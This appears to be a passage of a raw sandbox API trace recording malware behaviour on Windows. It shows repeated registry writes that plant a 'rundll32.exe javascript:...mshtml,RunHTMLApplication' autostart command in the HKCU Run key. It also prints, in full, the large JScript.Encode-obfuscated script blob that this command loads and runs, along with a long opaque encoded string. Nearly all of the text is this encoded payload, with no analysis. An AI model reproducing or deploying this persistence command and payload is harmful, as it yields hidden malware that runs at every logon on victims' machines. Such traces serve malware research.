1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0107.249] RegCloseKey (hKey=0x240) returned 0x0 [0107.249] Sleep (dwMilliseconds=0x1388) [0112.256] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x240, lpdwDisposition=0x0) returned 0x0 [0112.257] NtSetValueKey (in: KeyHandle=0x240, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0112.257] RegSetValueExW (in: hKey=0x240, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0112.258] RegCloseKey (hKey=0x240) returned 0x0 [0112.259] Sleep (dwMilliseconds=0x1388) [0117.262] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x240, lpdwDisposition=0x0) returned 0x0 [0117.262] NtSetValueKey (in: KeyHandle=0x240, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0117.262] RegSetValueExW (in: hKey=0x240, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 